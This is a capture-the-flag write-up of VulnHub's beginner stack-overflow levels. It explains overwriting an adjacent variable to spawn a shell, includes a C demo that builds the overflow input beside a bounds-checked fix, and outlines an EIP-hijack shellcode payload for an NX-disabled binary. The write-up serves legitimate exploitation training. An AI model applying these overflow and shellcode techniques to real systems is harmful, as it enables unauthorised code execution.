Hello guys, here's my write-up, Part 1, for the Stack Overflows levels from VulnHub: https://www.vulnhub.com/entry/stack-overflows-for-beginners-1,290/
Level 1:
First, let's look at the source code.

We provide the binary an input via argv[1] and it compares it: if the value of key is equal to 0x42424242 it gives us "/bin/sh". We need to overflow the buffer with more than 32 bytes to write a value into key; if we put 32 characters and then anything else, we overwrite the value of key.
If we set a breakpoint on the cmp instruction, pass "A"*36 as the argument and look at the value it is compared against:

Now we simply replace the last 4 "A"s with 4 "B"s to get 0x42 in each byte, using this code. Note: to get 0x42424242 into key, send the value in little-endian byte order: https://en.wikipedia.org/wiki/Endianness#Little-endian

:~$ ./levelOne $(python exploit.py)
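As an added example that is not the challenge's own source (the write-up shows the Level 1 code only as a screenshot), here is a reconstruction in C of the layout described above: a 32-byte buffer directly followed by the 4-byte key, with the unbounded copy beside a bounded one, plus the little-endian packing the note above refers to. The struct, the guard bytes and the function names are my assumptions, not the binary's.

```c
#include <stdint.h>
#include <string.h>
#include <stdio.h>
#define MAGIC 0x42424242u /* the value Level 1 compares key against */

/* Assumed layout from the write-up: a 32-byte buffer directly followed by key. */
struct frame {
    char     buffer[32];
    uint32_t key;
    char     guard[8]; /* room for the terminating NUL so the demo itself stays in bounds */
};

/* The defect: the copy stops at the input's NUL, not the buffer's end, so input bytes
 * 33..36 land in key. Capped at the frame size only to keep the demo safe; strcpy has no cap. */
static int check_key_unbounded(const char *input) {
    struct frame f;
    char *dst = (char *)&f; /* the frame as raw bytes, which is how an overflow sees it */
    size_t i;
    memset(&f, 0, sizeof f);
    for (i = 0; input[i] != '\0' && i < sizeof f - 1; i++)
        dst[i] = input[i];
    dst[i] = '\0';
    return f.key == MAGIC;
}

/* The fix: check the length against the destination first; -1 = rejected, not silently truncated. */
static int check_key_bounded(const char *input) {
    struct frame f;
    size_t n = strlen(input);
    memset(&f, 0, sizeof f);
    if (n >= sizeof f.buffer)
        return -1;
    memcpy(f.buffer, input, n + 1);
    return f.key == MAGIC;
}

/* Little-endian packing of a 32-bit value, like Python's struct.pack("<I", v). */
static void pack_le32(uint32_t v, unsigned char out[4]) {
    for (int i = 0; i < 4; i++)
        out[i] = (unsigned char)(v >> (8 * i));
}
/* The 36-byte Level 1 input: 32 bytes of padding, then the key in little-endian order. */
static size_t build_level1_input(char out[37]) {
    memset(out, 'A', 32);
    pack_le32(MAGIC, (unsigned char *)out + 32);
    out[36] = '\0';
    return 36;
}

int main(void) { /* prints "1 -1": the overflow sets key, the bounded copy rejects the input */
    char p[37]; build_level1_input(p);
    printf("%d %d\n", check_key_unbounded(p), check_key_bounded(p)); return 0; }
```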

___________________________________________________________________
Level 2:
Let's start with Level 2. There is no source code for this binary, so we need to run it under a debugger (e.g. gdb).
$ gdb -q ./levelTwo

There are two functions (setuid, hello); we are interested in the hello function. Let's disassemble it and see.

Hmm, strcpy and printf? Let's run the binary and see.

There's a SIGSEGV (segmentation fault) because main does a cmp (compare) on the argument you provide, and we ran it with none. Let's add an argument and run again.

The hello function just prints out the argument we give it. Let's try to overflow the buffer with a pattern to find the size of the buffer for that argument. I use this pattern: 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ'

Segmentation fault again, but now EIP (Extended Instruction Pointer) holds 0x4a4a4a4a ("JJJJ"), an address it cannot execute. First step done: we control EIP and we know the buffer size. How?

Now let's check the memory protections by running checksec in gdb. NX is disabled, which means we can execute instructions on the stack. We can exploit this by placing shellcode on the stack and making EIP return to the address where the shellcode begins.
SHELLCODE: a set of instructions injected by the user and executed by the exploited binary. The payload layout is SHELLCODE + padding + address of the shellcode, 40 bytes in total.
Shellcode that I use: http://shell-storm.org/shellcode/files/shellcode-517.php

Here's the stack frame after the buffer overflow; we can see the start address of our input at 0xffffd228 (0x41414141, "A" in hex). Now let's build the exploit code using Python.
We will use this address: 0xffffd288.

$ ./levelTwo $(python exp.py)

Related Things:
http://flint.cs.yale.edu/cs421/papers/x86-asm/asm.html